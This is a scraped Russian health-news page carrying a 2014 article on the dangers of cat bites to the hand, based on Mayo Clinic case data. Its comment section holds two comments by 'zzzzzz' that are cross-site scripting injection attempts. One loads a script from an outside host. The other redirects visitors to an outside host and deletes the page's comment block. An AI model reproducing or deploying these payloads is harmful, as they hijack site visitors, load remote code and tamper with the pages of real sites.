Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Может ли кошка отправить ...  >>  Может ли кошка отправить вас в операционную?
 
Обратная связь
 

Может ли кошка отправить вас в операционную?

Размер шрифта
09 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Вы женщина среднего возраста? Берегитесь своей кошки – из-за нее вы можете загреметь в больницу!

Может ли кошка отправить вас в операционную?

Своих хозяев кусают не только собаки, но и кошки. Бактерии, которые находятся на зубах последних, после укуса начинают активно размножаться в благоприятной для них среде – мягких тканях человека. Укусы кошек на руках подчас опасны – около трети всех укушенных нуждаются в госпитализации, а иногда и хирургическом вмешательстве. Согласно статистике, чаще всего жертвами домашних тигров становятся женщины среднего возраста. 

Так почему же укусы кошек опаснее укусов собак? Дело вовсе не в том, что у кошек во рту больше бактерий. Оказывается, все дело в клыках. 

Зубы собак не такие острые, поэтому раны, оставляемые ими, не глубоки и затрагивают лишь поверхностные слои  кожи. Кошачьи клыки гораздо острее, так что они могут проникать глубоко в ткани. Поэтому при кошачьих укусах бактерии могут поражать суставы и сухожилия. При этом снаружи укус может выглядеть совершенно невинно – лишь пара ранок на коже, в то время как глубокие ткани уже инфицированы. 

Обычно те бактерии, которые обнаруживаются на кошачьих зубах, типичны лишь для животных, поэтому стандартные человеческие антибиотики в таких случаях малоэффективны. 

Вся подноготная исследования

В клинике Мейо, Рочестер, в 2009-2011 годах было зарегистрировано 193 случая укусов кошек в области рук. 57 из этих пациентов были госпитализированы, в среднем госпитализация длилась 3 дня. 38 из них нуждались в хирургической обработке раны (промывание, иссечение инфицированных краев). 8 пациентам потребовалось неоднократное вмешательство, а некоторым была проведена реконструктивная пластика тканей. 

Из 193 пациентов 69% были женщинами, средний возраст – 42 года. Среднее время между укусом и обращением за помощью составило 27 часов. Было выявлено, что среди пациентов с укусами в область запястья или любых других суставов кистей доля госпитализированных была выше, чем среди укушенных в мягкие ткани рук. 

36 пациентов были госпитализированы немедленно, 154 находились на амбулаторном лечении оральными антибиотиками и 3 обратившихся не нуждались в лечении. У 21 из амбулаторных пациентов (14%) лечение антибиотиками оказалось неэффективным, поэтому они были также госпитализированы. 

Итоги

Как врачам, так и хозяевам кошек следует более внимательно относиться к кошачьим укусам. При появлении отека, местном повышении температуры следует проводить хирургическое лечение.

Люди зачастую недооценивают кошачьи укусы, ведь они выглядят вполне безобидно – как уколы булавкой, в то время как собачьи укусы представляются хозяевам гораздо более опасными. Но теперь-то вы знаете, что с кошками и их укусами лучше не шутить. 

Данная статья опубликована на основе материалов, предоставленных клиникой Мейо, Рочестер, Миннесота, в 2014 году.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:33

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Блендеры и миксеры таят в себе страшного микроба, от которого не могут избавиться никакие средства! Что делать?   Домашние собаки не дадут ребенку стать аллергиком   Лучше всего грудное   Всемирная неделя первичного иммунодефицита начинается в Москве!  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Вы задохнетесь у себя дома, если не сделаете этого!
Что с моим ртом?
Как выглядит аллергия

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.